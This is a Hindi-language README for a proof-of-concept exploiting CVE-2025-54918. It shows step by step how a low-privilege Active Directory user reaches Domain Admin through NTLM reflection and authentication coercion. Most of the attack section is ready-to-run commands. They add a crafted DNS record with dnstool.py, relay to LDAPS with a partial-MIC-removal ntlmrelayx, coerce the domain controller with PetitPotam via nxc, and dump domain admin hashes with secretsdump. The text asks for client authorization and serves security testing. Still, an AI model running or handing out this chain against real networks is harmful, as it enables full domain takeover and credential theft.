
CVE-2025-54918 के लिए POC और एक तकनीकी प्रदर्शन।
महत्वपूर्ण:
CVE-2025-54918 का परीक्षण करने के लिए, आपको लक्षित Active Directory वातावरण में एक DNS रिकॉर्ड बनाना आवश्यक है।
परीक्षण से पहले हमेशा क्लाइंट से परामर्श करें और स्पष्ट प्राधिकरण प्राप्त करें, क्योंकि यह उत्पादन वातावरण में DNS और प्रमाणीकरण व्यवहार को प्रभावित कर सकता है।
यह रिपॉज़िटरी एक तकनीकी प्रमाण-अवधारणा प्रस्तुत करती है जो दर्शाती है कि कैसे एक निम्न-विशेषाधिकार वाला डोमेन उपयोगकर्ता, NTLM रिफ्लेक्शन को प्रमाणीकरण प्रेरण (authentication coercion) के साथ जोड़कर दुरुपयोग करते हुए, डोमेन व्यवस्थापक-स्तर (Domain Admin–level) की पहुँच तक विशेषाधिकार वृद्धि कर सकता है।
नोट: यह CVE, साइनिंग के True सेट होने पर भी शोषणीय है, जो डोमेन कंट्रोलर के लिए डिफ़ॉल्ट है। इसके अलावा, CVE-2025–54918 का फिक्स Windows 2025 के लिए था, और CVE-2025–33073 ने Windows 2022 के लिए (अनायास) फिक्स किया।
अधिक तकनीकी विवरण मेरे Medium पेज पर उपलब्ध है: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1
192.168.140.150 (साइनिंग True है, जो डोमेन कंट्रोलर के लिए डिफ़ॉल्ट है)192.168.140.135nahya.localtest वैध डोमेन उपयोगकर्ता (कोई DCSync विशेषाधिकार नहीं)आवश्यक रिपॉज़िटरी क्लोन करें:
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git
सत्यापित करें कि शोषण से पहले उपयोगकर्ता DCSync नहीं कर सकता:
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

NetBIOS नाम + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA का उपयोग करके एक DNS रिकॉर्ड बनाएं जो हमलावर के IP पर रिज़ॉल्व होता है।
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
dc.nahya.local -a add \
-r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
-d '192.168.140.135' -dns-ip 192.168.140.150

ntlmrelayx को आंशिक MIC निष्कासन और LDAP विशेषाधिकार वृद्धि सक्षम करके चलाएँ:
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC --escalate-user USERNAME --no-validate-privs

डोमेन कंट्रोलर को प्रेरण (coercion) तकनीक (PetitPotam) का उपयोग करके हमलावर-नियंत्रित DNS रिकॉर्ड में प्रमाणीकरण करने के लिए मजबूर करें:
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

विशेषाधिकार वृद्धि की पुष्टि करने के लिए secretsdump दोबारा चलाएँ:
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC
✅ अपेक्षित परिणाम: सफल DCSync और डोमेन व्यवस्थापक हैश की प्राप्ति

इस बिंदु पर, हमलावर:
भेद्यता और हमले की श्रृंखला की गहन व्याख्या के लिए Medium लेख देखें।
यह कार्य इनके बिना संभव नहीं होता:
impacket-partial-mic कार्यान्वयन के लिएNTLM और LDAP प्रमाणीकरण बाईपास भेद्यता का विश्लेषण – CrowdStrike ब्लॉग
https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/
Microsoft सुरक्षा सलाह – CVE-2025-54918 – MSRC अद्यतन मार्गदर्शिका
https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918
यह प्रमाण-अवधारणा केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान की गई है।